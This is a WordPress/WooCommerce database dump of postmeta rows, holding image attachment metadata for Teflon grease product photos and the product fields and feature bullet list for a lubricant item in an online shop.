INSERT INTO `wp_postmeta` VALUES (17781, 1806, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:36:"2016/09/Teflon-Grease-MS-THE-JAR.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-THE-JAR-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-THE-JAR-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-THE-JAR-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"Teflon-Grease-MS-THE-JAR-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-THE-JAR-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-THE-JAR-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-THE-JAR-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-THE-JAR-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17782, 1807, '_wp_attached_file', '2016/09/Teflon-Grease-MS-THT.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17783, 1807, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:32:"2016/09/Teflon-Grease-MS-THT.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THT-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THT-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THT-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"Teflon-Grease-MS-THT-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THT-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THT-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THT-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THT-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17784, 1808, '_wp_attached_file', '2016/09/Teflon-Grease-MS-TMW.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17785, 1808, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:32:"2016/09/Teflon-Grease-MS-TMW.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TMW-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TMW-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TMW-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"Teflon-Grease-MS-TMW-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TMW-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TMW-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TMW-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TMW-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17786, 1809, '_wp_attached_file', '2016/09/Teflon-Grease-MS-TMW-JAR.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17787, 1809, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:36:"2016/09/Teflon-Grease-MS-TMW-JAR.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TMW-JAR-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TMW-JAR-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TMW-JAR-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"Teflon-Grease-MS-TMW-JAR-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TMW-JAR-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TMW-JAR-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TMW-JAR-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TMW-JAR-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17788, 1810, '_wp_attached_file', '2016/09/Teflon-Grease-MS-TSS.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17789, 1810, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:32:"2016/09/Teflon-Grease-MS-TSS.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TSS-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TSS-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TSS-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"Teflon-Grease-MS-TSS-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TSS-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TSS-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TSS-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TSS-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17790, 1811, '_wp_attached_file', '2016/09/Teflon-Grease-MS-TWL.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17791, 1811, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:32:"2016/09/Teflon-Grease-MS-TWL.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TWL-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TWL-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TWL-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"Teflon-Grease-MS-TWL-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TWL-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TWL-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TWL-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-TWL-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17792, 1812, '_wp_attached_file', '2016/09/Teflon-Grease-MS-TWL-AEROSOL.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17793, 1812, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:40:"2016/09/Teflon-Grease-MS-TWL-AEROSOL.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"Teflon-Grease-MS-TWL-AEROSOL-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"Teflon-Grease-MS-TWL-AEROSOL-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"Teflon-Grease-MS-TWL-AEROSOL-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"Teflon-Grease-MS-TWL-AEROSOL-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"Teflon-Grease-MS-TWL-AEROSOL-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"Teflon-Grease-MS-TWL-AEROSOL-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"Teflon-Grease-MS-TWL-AEROSOL-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"Teflon-Grease-MS-TWL-AEROSOL-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17794, 1813, '_wp_attached_file', '2016/09/Teflon-Grease-MS-WLG-JAR.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17795, 1813, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:36:"2016/09/Teflon-Grease-MS-WLG-JAR.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-WLG-JAR-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-WLG-JAR-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-WLG-JAR-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"Teflon-Grease-MS-WLG-JAR-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-WLG-JAR-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-WLG-JAR-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-WLG-JAR-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-WLG-JAR-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17802, 1817, '_wp_attached_file', '2016/09/Teflon-Grease-MS-TSS_JAR.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17803, 1817, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:36:"2016/09/Teflon-Grease-MS-TSS_JAR.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS_JAR-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS_JAR-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS_JAR-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"Teflon-Grease-MS-TSS_JAR-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS_JAR-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS_JAR-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS_JAR-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS_JAR-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17804, 1818, '_wp_attached_file', '2016/09/Teflon-Grease-MS-TSS-JAR.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17805, 1818, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:36:"2016/09/Teflon-Grease-MS-TSS-JAR.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS-JAR-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS-JAR-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS-JAR-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"Teflon-Grease-MS-TSS-JAR-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS-JAR-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS-JAR-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS-JAR-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"Teflon-Grease-MS-TSS-JAR-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17806, 1106, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17807, 1819, '_edit_lock', '1482335009:2'); 
INSERT INTO `wp_postmeta` VALUES (17808, 1819, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (17809, 1819, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17810, 1819, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17811, 1819, '312_default_editor', '<ul>\r\n 	<li>Helps clean; low  to no oder</li>\r\n 	<li>Waterproofs, protects, lubricates and preserves</li>\r\n 	<li>For use on rubber, plastic, vinyl, leather, metal and wood</li>\r\n 	<li>Eliminates squeaking and binding in windows, hinges, locks, etc.</li>\r\n 	<li>Helps prevent rust, oxidation and corrosion on all metals</li>\r\n 	<li>Protects fishing gear, tools and farm equipment from salt, chlorine and corrosives</li>\r\n 	<li>Helps prevent snow sticking and muddy buildups on shovels, snowblowers, wheel wells, etc.</li>\r\n 	<li>NSF H-2 Listed</li>\r\n 	<li>Can withstand temperatures from -40°F (-40°C) up to 400°F (204°C).</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (17812, 1819, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17813, 1819, '716_default_editor', '<ul>\r\n 	<li>Hinges</li>\r\n 	<li>Latches</li>\r\n 	<li>Locks</li>\r\n 	<li>Shafts</li>\r\n 	<li>Conveyors</li>\r\n 	<li>Belts</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (17814, 1819, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17815, 1819, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17816, 1819, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17817, 1819, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17818, 1819, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17819, 1819, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17820, 1819, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17821, 1819, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17822, 1819, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17823, 1819, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17824, 1819, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17825, 1819, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17826, 1819, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17827, 1819, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17828, 1819, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17829, 1819, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17830, 1819, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17831, 1819, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17832, 1819, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17833, 1819, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17834, 1819, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17835, 1819, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17836, 1819, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17837, 1819, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17838, 1819, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17839, 1819, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17840, 1819, '_product_image_gallery', '1784,1788'); 
INSERT INTO `wp_postmeta` VALUES (17841, 1820, '_wp_attached_file', '2016/09/teflon-silicone-lubricant-2.jpg'); 
